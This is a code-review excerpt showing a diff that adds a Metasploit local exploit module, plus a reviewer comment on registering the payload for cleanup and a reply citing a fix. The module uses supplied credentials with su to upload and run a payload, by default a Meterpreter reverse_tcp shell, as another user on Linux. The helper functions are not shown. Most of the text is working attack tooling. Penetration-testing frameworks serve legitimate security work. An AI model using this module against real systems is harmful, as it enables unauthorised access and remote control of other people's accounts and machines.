modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  include Msf::Post::Linux
+  include Msf::Post::Linux::System
+  include Msf::Post::Unix
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  Rank = NormalRanking
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'Login to Another User with Su on Linux / Unix Systems',
+          'Description' => %q{
+            This module attempts to create a new login session by
+            invoking the su command of a valid username and password.
+
+            If the login is successful, a new session is created via
+            the specified payload.
+
+            Because su forces passwords to be passed over stdin, this
+            module attempts to invoke a psuedo-terminal with python,
+            python3, or script.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => 'Gavin Youker <youkergav@gmail.com>',
+          'DisclosureDate' => '1971-11-03',
+          'Platform' => ['linux', 'unix'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [
+            [
+              'Linux x86', {
+                'Arch' => ARCH_X86,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Linux x86_64', {
+                'Arch' => ARCH_X64,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              }
+            ],
+          ],
+          'DefaultTarget' => 0,
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+          'SessionTypes' => ['shell', 'meterpreter']
+        )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with.'])
+    ])
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ])
+  end
+
+  # Main function to run the exploit.
+  def exploit
+    # Check for vulnerable system.
+    if check == CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'target is not vulnerable')
+    end
+
+    fail_with(Failure::NoAccess, 'username not found') unless user_exists(datastore['USERNAME'])
+
+    # Upload the payload and stager files.
+    print_status('Uploading payload to target')
+    payload_file = build_payload(generate_payload_exe, datastore['WritableDir'])
+
+    # Execute the payload.
+    print_status('Attempting to login with su')
+    exec_payload(datastore['USERNAME'], datastore['PASSWORD'], payload_file)
+    register_files_for_cleanup(payload_file)
```

Comment:
The payload file should be registered for cleanup immediately after upload. Currently, there are multiple method calls between the upload and the registration for cleanup. In particular, the `exec_payload` method can `fail_with`, causing the module to return prematurely, leaving the payload on disk.

Reply:
Fixed in commit 23c6c415eb48a3d854a44968260e9167a7005f96